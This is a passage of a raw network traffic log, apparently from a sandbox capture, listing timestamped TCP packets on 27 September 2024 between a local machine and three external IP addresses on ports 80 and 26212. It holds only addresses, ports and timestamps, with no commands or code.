                                                                          Sep 27, 2024 04:21:16.279593945 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279612064 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279623985 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279633045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279660940 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.279661894 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.279690027 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279700994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279723883 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279733896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.279748917 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.279750109 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.279787064 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.279787064 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.280359983 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280371904 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280383110 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280421972 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.280441999 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280452013 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280462027 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280472994 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280482054 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.280482054 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.280499935 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.280580044 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.280587912 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280599117 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280616045 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280653954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.280653954 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.280689001 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280699015 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280709982 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280720949 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.280740023 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.280780077 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.286185026 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:16.300348043 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.300376892 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.300389051 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.300407887 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.300419092 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.300430059 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.300441027 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.300465107 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.300487041 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.300487041 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.300553083 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.301974058 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.301984072 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.301995039 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.302042961 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.302053928 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.302064896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.302074909 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.302076101 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.302087069 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.302125931 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.302177906 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.302261114 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.302301884 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.303680897 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.303757906 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.303807020 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.303817034 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.303827047 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.303838015 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.303848028 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.303859949 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.303869963 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.303870916 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.303924084 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.303925037 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.304337025 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.304409981 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.304461002 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.304472923 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.304482937 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.304493904 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.304503918 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.304517031 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.304519892 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.304546118 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.304567099 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.304569960 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.304616928 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.306665897 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306740046 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.306754112 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306763887 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306775093 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306785107 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306796074 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306813002 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306822062 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306833029 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306837082 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.306870937 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.306901932 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.306917906 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306927919 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306937933 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306948900 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306960106 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306973934 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.306976080 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306991100 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.306996107 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307002068 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307015896 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307017088 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307041883 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307054996 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307066917 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307076931 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307086945 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307090044 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307107925 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307120085 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307133913 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307145119 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307167053 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307236910 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307248116 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307265043 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307276011 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307285070 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307290077 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307324886 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307324886 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307342052 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307353020 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307380915 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307396889 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307406902 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307406902 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307442904 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307466030 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307477951 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307488918 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307499886 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307502985 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307512045 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307527065 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307533026 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307533026 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307558060 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307581902 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307656050 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307667017 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307677031 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307688951 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307708025 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307739973 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307796001 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307806969 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307822943 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307832003 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307842016 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307846069 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307853937 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307868958 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307877064 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307913065 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307913065 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307924032 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307935953 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307966948 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.307986975 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.307986975 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.308001041 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.308028936 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.308033943 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.308039904 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.308053017 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.308058023 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.308080912 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.308080912 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.308115959 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.308126926 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.308150053 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.308150053 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.308183908 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.313976049 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.313994884 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314004898 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314045906 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314053059 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.314095974 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.314095974 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.314097881 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314110041 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314165115 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.314165115 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.314193964 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314205885 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314217091 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314229012 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314249039 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314251900 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.314251900 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.314290047 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.314321995 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.314332008 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314342976 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314357042 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314366102 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.314376116 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.314408064 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.314438105 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.332604885 CEST4971426212192.168.2.595.179.250.45
                                                                          Sep 27, 2024 04:21:16.337503910 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337522030 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337541103 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337551117 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337558985 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337627888 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337636948 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337647915 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337745905 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337800026 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337810993 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337827921 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337831020 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.337837934 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337846994 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337858915 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337862968 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.337862968 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.337871075 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337883949 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337883949 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.337923050 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.337923050 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.337961912 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337971926 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337980032 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337984085 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.337994099 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.338004112 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.338006020 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.338013887 CEST262124971495.179.250.45192.168.2.5
                                                                          Sep 27, 2024 04:21:16.338027000 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.338205099 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.339427948 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.339447975 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.339459896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.339490891 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.339490891 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.339540958 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.339553118 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.339564085 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.339576006 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.339586020 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.339586020 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.339678049 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.340785980 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.340836048 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.340847969 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.340857029 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.340914965 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.340925932 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.340928078 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.340928078 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.340944052 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.340955019 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.340975046 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.340981007 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.340993881 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.340995073 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.341006041 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.341021061 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.341047049 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.341047049 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.341059923 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.341073036 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.341083050 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.341094017 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.341105938 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.341105938 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.341126919 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.341141939 CEST8049724176.113.115.95192.168.2.5
                                                                          Sep 27, 2024 04:21:16.341146946 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.341180086 CEST4972480192.168.2.5176.113.115.95
                                                                          Sep 27, 2024 04:21:16.344060898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344080925 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344090939 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344125986 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344125986 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344147921 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344199896 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344212055 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344218969 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344255924 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344259024 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344259024 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344269037 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344301939 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344301939 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344424963 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344481945 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344578981 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344588995 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344605923 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344623089 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344635963 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344639063 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344639063 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344646931 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344664097 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344671011 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344672918 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344695091 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344727039 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344727039 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344774008 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344785929 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344820976 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344826937 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344826937 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344834089 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344857931 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344868898 CEST8049725185.215.113.117192.168.2.5
                                                                          Sep 27, 2024 04:21:16.344875097 CEST4972580192.168.2.5185.215.113.117
                                                                          Sep 27, 2024 04:21:16.344875097 CEST4972580192.168.2.5185.215.113.117
